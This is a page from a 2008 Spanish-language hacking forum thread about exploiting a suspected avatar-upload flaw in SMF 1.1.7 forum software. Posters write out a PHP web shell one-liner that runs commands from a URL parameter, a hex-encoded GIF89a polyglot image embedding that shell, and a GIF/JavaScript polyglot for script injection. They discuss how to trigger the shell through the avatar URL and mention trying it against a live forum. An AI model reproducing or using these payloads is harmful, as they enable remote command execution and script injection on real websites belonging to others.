elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [Duda] Existe o no el Bug SMF 1.1.7
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [Duda] Existe o no el Bug SMF 1.1.7  (Leído 7,050 veces)
shimpei

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Re: [Duda] Existe o no el Bug SMF 1.1.7
« Respuesta #10 en: 25 Diciembre 2008, 19:15 pm »

gracias por la aclaracion  ;D
asi que si quiero inyectar codigo JS tengo que usar "= 1 y “/*” and “*/”."
y si solo quiero agregar la shellcita <?php system($_GET[cmd]); ?>
tengo que dejar la cabecera tal como esta no? (GIF89a)
quedaria algo asi hexadecimalmente

474946383961000100800100000000FFFFFF21FE133C3F70687020

73797374656D28245F4745545B636D645D293B203F3E002C000000000

10001000002024401003B
En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: [Duda] Existe o no el Bug SMF 1.1.7
« Respuesta #11 en: 25 Diciembre 2008, 22:08 pm »

Bien si vemos si lo vemos como javascript se prodria entender un poco mejor.

Código
  1. GIF89a=1
  2. /*Basura Binaria whatever!!*/
  3. alert("xD");
  4. /*Mas basura*/
  5.  

Eso es para injectar JS desde alguna pagina vulnerable, se podria injectar PHP o cualquier otro leguje, sin embargo
para el php como pueden ver en la imagen de muestra de ese ejemplo:
:http://www.flickr.com/photos/matteocarli/580869084/

No importan los caracteres Binarios, ahora lo que si importa es el navegador. shimpei no me he puesto a ver la secuencia hexadecimal que se genera pero me imagino que si entendistes el ejemplo si va a funcionar.

Saludos!


En línea

shimpei

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Re: [Duda] Existe o no el Bug SMF 1.1.7
« Respuesta #12 en: 26 Diciembre 2008, 00:34 am »

si lo entendi, estoy probandolo en un smf 1.1.7 al cual siempre le tiro XD
lo unico que consegui es que intentando el phpinfo me tire un error 500  XD
seguire viendo si se puede hacer algo pero de momento inyecte ambos codigos y los subi como avatar y no paso nada
En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

Dacan

Desconectado Desconectado

Mensajes: 237



Ver Perfil WWW
Re: [Duda] Existe o no el Bug SMF 1.1.7
« Respuesta #13 en: 26 Diciembre 2008, 01:06 am »

Recuerda no es seguro de que exista dicho bug pero lo mas probable ya que segun el encontraron  esos códigos.

Creo que debe ser así:  imagen.gif?cmd=Is (Ejemplo)

Me podrías pasar la imagen gif con el código ya inyectado, te lo agradecería mucho. 

Saludos, Dacan  :D
En línea

shimpei

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Re: [Duda] Existe o no el Bug SMF 1.1.7
« Respuesta #14 en: 26 Diciembre 2008, 03:53 am »

a menos que quieras inyectar codigo JS solo basta con que con el gimp lo agreges como comentario. si queres te la spaso por pm.
aun no entiendo muy bien como se dispararia la shell, para ver un avatar seria asi la direccion http://www.explotame.com/foro/index.php?action=dlattach;attach=110;type=avatar
como habria que manipularla?
« Última modificación: 26 Diciembre 2008, 04:16 am por shimpei » En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

shimpei

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Re: [Duda] Existe o no el Bug SMF 1.1.7
« Respuesta #15 en: 28 Diciembre 2008, 01:25 am »

me parece que las nueves versiones de smf convierten las imagenes a png despues de que se suben asi que en ese transpaso se borra la ***** que le agregamos XD
voy a seguri haciendo pruebas al respecto

saludos

// si efectivamente tiene que ser una animacion si o si lo que subimos sino el smf la convierte en png.

a todo esto como se lanzaria el comentario que tenemos en la imagen en shell?
« Última modificación: 28 Diciembre 2008, 01:37 am por shimpei » En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines